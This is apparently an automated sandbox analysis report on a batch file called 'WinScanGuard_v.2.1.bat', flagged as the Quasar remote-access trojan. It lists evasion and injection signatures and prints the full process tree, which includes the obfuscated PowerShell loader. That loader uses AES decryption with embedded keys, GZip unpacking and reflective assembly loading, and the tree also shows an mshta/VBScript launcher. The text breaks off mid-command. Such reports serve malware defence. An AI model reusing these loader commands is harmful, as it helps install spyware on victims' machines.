Edit tour
Windows
Analysis Report
WinScanGuard_v.2.1.bat
Overview
General Information
Detection
Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Classification
- System is w10x64
- cmd.exe (PID: 6772 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\WinSc anGuard_v. 2.1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WinScanGuard_v.2.1.bat.exe (PID: 7128 cmdline:
"WinScanGu ard_v.2.1. bat.exe" - noprofile -windowsty le hidden -ep bypass -command function o LSgt($QHQw Z){ $FhDgh =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $Fh Dgh.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $Fh Dgh.Paddin g=[System. Security.C ryptograph y.PaddingM ode]::PKCS 7; $FhDgh. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('ONJSi5Fj Jzv4AOEMBv ugvr4ituUV mgVNRnjeJy rP0WQ='); $FhDgh.IV= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('CL QNYwl0vsdf D4X+5YKrxQ =='); $SpF lB=$FhDgh. CreateDecr yptor(); $ return_var =$SpFlB.Tr ansformFin alBlock($Q HQwZ, 0, $ QHQwZ.Leng th); $SpFl B.Dispose( ); $FhDgh. Dispose(); $return_v ar;}functi on rnHmS($ QHQwZ){ $W xVgK=New-O bject Syst em.IO.Memo ryStream(, $QHQwZ); $ bpCBe=New- Object Sys tem.IO.Mem oryStream; $coUVU=Ne w-Object S ystem.IO.C ompression .GZipStrea m($WxVgK, [IO.Compre ssion.Comp ressionMod e]::Decomp ress); $co UVU.CopyTo ($bpCBe); $coUVU.Dis pose(); $W xVgK.Dispo se(); $bpC Be.Dispose (); $bpCBe .ToArray() ;}function ZAtIe($QH QwZ,$cjUqy ){ $oSPmD= [System.Re flection.A ssembly]:: ('daoL'[-1 ..-4] -joi n '')([byt e[]]$QHQwZ ); $xWTDt= $oSPmD.Ent ryPoint; $ xWTDt.Invo ke($null, $cjUqy);}$ YlWDR=[Sys tem.IO.Fil e]::('txeT llAdaeR'[- 1..-11] -j oin '')('C :\Users\us er\Desktop \WinScanGu ard_v.2.1. bat').Spli t([Environ ment]::New Line);fore ach ($XUIQ g in $YlWD R) { if ($ XUIQg.Star tsWith('SE ROXEN')) { $sOgSv=$X UIQg.Subst ring(7); b reak; }}$Z ErMU=[stri ng[]]$sOgS v.Split('\ ');$tzgBc= rnHmS (oLS gt ([Conve rt]::('gni rtS46esaBm orF'[-1..- 16] -join '')($ZErMU [0])));$Tt Dxt=rnHmS (oLSgt ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($Z ErMU[1]))) ;ZAtIe $Tt Dxt (,[str ing[]] ('' , 'idTznCC sreqaEEjvu wzuTuitglI VMFHEuLsTn nuHsLwyMmx aqK', 'LkI zMJCsatThE deYOSSAwnZ MOfyqejPcY tnoxQiuObL PDohIJN')) ;ZAtIe $tz gBc (,[str ing[]] ('' , 'idTznCC sreqaEEjvu wzuTuitglI VMFHEuLsTn nuHsLwyMmx aqK', 'LkI zMJCsatThE deYOSSAwnZ MOfyqejPcY tnoxQiuObL PDohIJN')) ; MD5: 04029E121A0CFA5991749937DD22A1D9) - dllhost.exe (PID: 4916 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{17980c 38-011a-4e 2a-a8da-a3 b9e80db269 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 7132 cmdline:
C:\Windows \SysWOW64\ dllhost.ex e /Process id:{6ee5d1 df-df32-41 4a-8053-43 a03a04def5 } MD5: 6F3C9485F8F97AC04C8E43EF4463A68C) - WerFault.exe (PID: 1440 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 132 -s 144 MD5: C31336C1EFC2CCB44B4326EA793040F2) - dllhost.exe (PID: 1228 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{b60ad2 32-6d40-48 22-9220-52 a4d3050cb3 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 5252 cmdline:
C:\Windows \SysWOW64\ dllhost.ex e /Process id:{603825 cb-58d6-4a b4-99a0-2f db5cd309d6 } MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
- $sxr-mshta.exe (PID: 344 cmdline:
C:\Windows \$sxr-msht a.exe "jav ascript:do cument['wr '+'it'+'e' ]('<h'+'tm '+'l>'+'<s '+'cr'+'ip '+'t\x20'+ 'la'+'ng'+ 'ua'+'ge'+ '=\x22'+'V B'+'Sc'+'r i'+'pt'+'\ x22>'+'Se' +'t\x20'+' ob'+'jS'+' he'+'ll'+' \x20='+'\x 20C'+'re'+ 'at'+'eO'+ 'bj'+'ec'+ 't('+'\x22 W'+'Sc'+'r i'+'pt'+'. S'+'he'+'l l'+'\x22)' +'\x20:'+' \x20o'+'bj '+'Sh'+'el '+'l.'+'Ru '+'n\x20'+ '\x22C:\\W indows\\$s xr-c'+'md' +'.e'+'xe' +'\x20/'+' c %'+'$sxr -bWTLJBKbo gHiYUerhoA r4312:&#<? =%'+'\x22, '+'\x200'+ ',\x20'+'T r'+'ue'+'< /'+'sc'+'r i'+'pt'+'> <'+'/h'+'t m'+'l>');c lose();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - $sxr-cmd.exe (PID: 5820 cmdline:
"C:\Window s\$sxr-cmd .exe" /c % $sxr-bWTLJ BKbogHiYUe rhoAr4312: &#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - $sxr-powershell.exe (PID: 5088 cmdline:
C:\Windows \$sxr-powe rshell.exe -NoLogo - NoProfile -Nonintera ctive -Win dowStyle h idden -Exe cutionPoli cy bypass -Command f unction ZX owG($YGfCS ){ $HJBVM= [System.Se curity.Cry ptography. Aes]::Crea te(); $HJB VM.Mode=[S ystem.Secu rity.Crypt ography.Ci pherMode]: :CBC; $HJB VM.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $HJBVM.K ey=[System .Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( 'jR/ER/S13 sxmxzdcDQ4 cx+zLfjuBr /t1zOyGZlv i3Nc='); $ HJBVM.IV=[ System.Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')('RiG EPzaIqqVKt P3vMKz42w= ='); $SHNY R=$HJBVM.( 'rotpyrceD etaerC'[-1 ..-15] -jo in '')(); $ptoRz=$SH NYR.('kcol BlaniFmrof snarT'[-1. .-19] -joi n '')($YGf CS, 0, $YG fCS.Length ); $SHNYR. Dispose(); $HJBVM.Di spose(); $ ptoRz;}fun ction Miaj R($YGfCS){ $VHZiJ=Ne w-Object S ystem.IO.M emoryStrea m(,$YGfCS) ; $MKYCr=N ew-Object System.IO. MemoryStre am; $pphYy =New-Objec t System.I O.Compress ion.GZipSt ream($VHZi J, [IO.Com pression.C ompression Mode]::Dec ompress); $pphYy.Cop yTo($MKYCr ); $pphYy. Dispose(); $VHZiJ.Di spose(); $ MKYCr.Disp ose(); $MK YCr.ToArra y();}funct ion DEttm( $YGfCS,$Zt wIE){ $mZo lj=[System .Reflectio n.Assembly ]::Load([b yte[]]$YGf CS); $lOFy P=$mZolj.E ntryPoint; $lOFyP.In voke($null , $ZtwIE); }$HJBVM1 = New-Objec t System.S ecurity.Cr yptography .AesManage d;$HJBVM1. Mode = [Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC;$HJBVM 1.Padding = [System. Security.C ryptograph y.PaddingM ode]::PKCS 7;$HJBVM1. Key = [Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('jR/ER/ S13sxmxzdc DQ4cx+zLfj uBr/t1zOyG Zlvi3Nc=') ;$HJBVM1.I V = [Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('RiGEPzaI qqVKtP3vMK z42w==');$ GhtEl = $H JBVM1.('ro tpyrceDeta erC'[-1..- 15] -join '')();$tSR UF = [Syst em.Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )('/drqfgt KhdXyibTYP 3tLyQ=='); $tSRUF = $ GhtEl.('kc olBlaniFmr ofsnarT'[- 1..-19] -j oin '')($t SRUF, 0, $ tSRUF.Leng th);$tSRUF = [System .Text.Enco ding]::('8 FTU'[-1..- 4] -join ' ').('gnirt SteG'[-1.. -9] -join '')($tSRUF );$tbgVF = [System.C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')('u YhEUY/+Hnw QeclFyB1FD UqtQym+nHV dwwfjEKKh6 LU=');$tbg VF = $GhtE l.('kcolBl aniFmrofsn arT'[-1..- 19] -join '')($tbgVF , 0, $tbgV F.Length); $tbgVF = [ System.Tex t.Encoding ]::('8FTU' [-1..-4] - join '').( 'gnirtSteG '[-1..-9] -join '')( $tbgVF);$m jWsq = [Sy stem.Conve rt]::('gni rtS46esaBm orF'[-1..- 16] -join '')('v2S4N wnXvXtvXwh esSwNIQ==' );$mjWsq = $GhtEl.(' kcolBlaniF mrofsnarT' [-1..-19] -join '')( $mjWsq, 0, $mjWsq.Le ngth);$mjW sq = [Syst em.Text.En coding]::( '8FTU'[-1. .-4] -join '').('gni